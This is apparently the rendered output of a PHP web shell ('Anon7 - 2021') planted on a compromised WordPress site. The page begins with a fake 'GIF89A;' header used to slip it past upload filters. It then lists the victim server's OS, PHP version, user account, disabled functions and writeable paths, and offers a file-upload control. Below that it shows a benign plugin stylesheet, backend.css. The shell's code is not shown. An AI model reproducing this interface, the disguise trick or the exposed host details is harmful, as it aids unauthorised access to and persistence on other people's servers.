GIF89A; .
KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Microsoft-IIS/10.0
System : Windows NT HMW9050 6.2 build 9200 (Unknow Windows version Standard Edition) i586
User : fatorc ( 0)
PHP Version : 5.3.28
Disable Function : escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_open, shell_exec, system, dl, popen, php_check_syntax, php_strip_whitespace, symlink, link, openlog, apache_child_terminate
Directory :  e:/home/fatorc/Web/wp-content/plugins/coming-soon-wp/assets/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : e:/home/fatorc/Web/wp-content/plugins/coming-soon-wp/assets/css/backend.css
a:hover,a:focus{
	outline: none;
	text-decoration: none;
}
.tab .nav-tabs{
	background: #transparent;
	border-bottom:0px;
}
.tab .nav-tabs li{
	text-align: center;
	margin-right: 8px;
	margin-bottom: 10px;
}
.tab .nav-tabs li a{
	font-size: 21px;
	font-weight: 400;
	color: #000;
	padding: 10px 22px;
	background: #f7f7f7;
	margin-right: 0;
	border-radius: 0;
	border: none;
	position: relative;
	transition: all 0.5s ease 0s;
	text-shadow: none;
	outline: none;
	box-shadow: 0 0 25px rgba(0,0,0,.1);
}
.tab .nav-tabs li.active a,
.tab .nav-tabs li a:hover{
	background: #1e73be;
	color: #fff;
	border: none;
}
.tab .tab-content{
	font-size: 15px;
	color: #3d3537;
	line-height: 30px;
	padding: 30px 40px;
   background:#fff;
   margin-top:10px;
   box-shadow: 0 0 8px rgba(0,0,0,.1);
}
.tab .tab-content h3{
	font-size: 20px;
	font-weight: bold;
	margin-top: 0;
}
@media only screen and (max-width: 480px){
	.tab .nav-tabs li{ width: 100%; }
}
.coming-soon-wp-panel{
	overflow:hidden;
	display:block;
	width:100%;
	padding-top:40px;
	padding-left:10px;
	padding-right:20px;
	padding-bottom: 20px;
}
.radio-span{
	border-bottom: 2px dashed #eae8e8;
}
.form-table th{
	vertical-align: top;
	text-align: left;
	padding: 20px 9px 5px 0;
	width: 200px;
	line-height: 1.3;
	font-weight: 600;
	font-size: 18px;
}
.csw-admin-img{
	width:100px;
	height:100px;
	display:block;
	margin-bottom:10px;
	border:10px solid #f2f2f2;
}
 input[type=text].pro_text,  input[type=url].pro_text,  input[type=email].pro_text{
		width: 70%;
		margin-bottom: 10px;
		margin-right: 10px;
		padding: 10px;
		display: block;
		border-radius: 0px;
}
textarea.pro_text{
	resize: vertical;
	width: 85%;
	border-radius: 0px;
}

.range-slider-font{
	background-color: #f7fcff !important;
    border-radius: 5px !important;
    font-size: 0.9em !important;
    height: 29px !important;
    padding-top: 4px !important;
    text-align: center !important;
    width: 55px !important;
    margin-left: 25px !important;
    border-color: #ffffff !important !important;
    margin-right: 5px !important;
    -webkit-box-shadow: inset 0 0 10px rgba(0, 0, 0, 0.15);
    box-shadow: inset 0 0 10px rgba(0, 0, 0, 0.15) !important;
}

.text-and-color-panel .ui-state-default, .text-and-color-panel  .ui-widget-content .ui-state-default{
		background-color: #fff;
		border: 0px solid #c5dbec;
		border-radius: 100%;
		cursor: move;
		height: 30px;
		left: 0;
		top: -9px;
		position: absolute;
		width: 30px;
		-webkit-box-shadow: 1px 1px 11px rgba(0, 0, 0, 0.5);
		box-shadow: 1px 1px 11px rgba(0, 0, 0, 0.5);
	}
	
	.text-and-color-panel  .ui-state-default, .ui-widget-header .ui-state-default {
		border: 1px solid #c5dbec;
		background: transparent;
		font-weight: bold;
		color: #2e6e9e;
	}
	.ui-slider-horizontal {
		height: .8em;
	}
	.ui-widget-content {
		border: 0px solid #a6c9e2; 
		background: #a9acb1;
		color: #222222;
	}
   	.ui-widget-header {
		border: 0px solid #4297d7;
		background: #ef4238;
		color: #ffffff;
		font-weight: bold;
	}
.wp-color-result{
height:24px !important;
}	


/* The CSS */
.dazz-standard-dropdown {
    margin: 0;
    -webkit-border-radius:4px;
    -moz-border-radius:4px;
    border-radius:4px;
    -webkit-box-shadow: 0 3px 0 #ccc, 0 -1px #fff inset;
    -moz-box-shadow: 0 3px 0 #ccc, 0 -1px #fff inset;
    box-shadow: 0 3px 0 #ccc, 0 -1px #fff inset;
    background: #f8f8f8;
    color:#888;
    border:none;
    outline:none;
    display: inline-block;
    -webkit-appearance:none;
    -moz-appearance:none;
    appearance:none;
    cursor:pointer;
	width:180px;
	line-height:21px !important;
	padding-left:5px !important;
}

/* Targetting Webkit browsers only. FF will show the dropdown arrow with so much padding. */
@media screen and (-webkit-min-device-pixel-ratio:0) {
    select {padding-right:18px}
}

.dazz-dropdown {position:relative}
.dazz-dropdown:after {
    content: '<>';
    font: 18px "Consolas", monospace;
    color: #aaa;
    -webkit-transform: rotate(90deg);
    -moz-transform: rotate(90deg);
    -ms-transform: rotate(90deg);
    transform: rotate(90deg);
    right: 8px;
    top: 2px;
    padding: 0 0 2px;
    border-bottom: 1px solid #ddd;
    position: absolute;
    pointer-events: none;
}
.dazz-dropdown:before {
        content: '';
    right: 6px;
    top: 0px;
    width: 28px;
    height: 21px;
    background: #f8f8f8;
    position: absolute;
    pointer-events: none;
    display: block;
}

.portfolio_read_more_btn {
    border: 1px solid #E83F33;
    border-radius: 0px;
    margin-bottom: 10px;
    text-transform: uppercase;
    font-weight: 600;
    font-size: 14px;
    padding: 12px 12px;
    display: inline-block;
    border-radius: 2px;
    cursor: pointer;
    letter-spacing: 1px;
    outline: none;
    position: relative;
    text-decoration: none !important;
    color: #fff !important;
    -webkit-transition: all ease 0.5s;
    -moz-transition: all ease 0.5s;
    transition: all ease 0.5s;
    background: #E83F33;
    padding-left: 22px;
    padding-right: 22px;
}
.portfolio_demo_btn {
    border: 1px solid #919499;
    border-radius: 0px;
    margin-bottom: 10px;
    text-transform: uppercase;
    font-weight: 600;
    font-size: 14px;
    padding: 12px 12px;
    display: inline-block;
    border-radius: 2px;
    cursor: pointer;
    letter-spacing: 1px;
    outline: none;
    position: relative;
    text-decoration: none !important;
    background-color: #242629;
    border-color: #242629;
    color: #fff !important;
    -webkit-transition: all ease 0.5s;
    -moz-transition: all ease 0.5s;
    transition: all ease 0.5s;
    padding-left: 22px;
    padding-right: 22px;
}

.dazz_cs_loding {
  background:  url("./images/loading.gif") no-repeat;
  display: none;
  font-size: 20px;
  height: 100%;
  left: 50%;
  padding: 23px 6px 10px 52px;
  position: fixed;
  text-align: center;
  top: 30%;
  vertical-align: middle;
  width: 100%;
  z-index: 9999;
  
}

Anon7 - 2021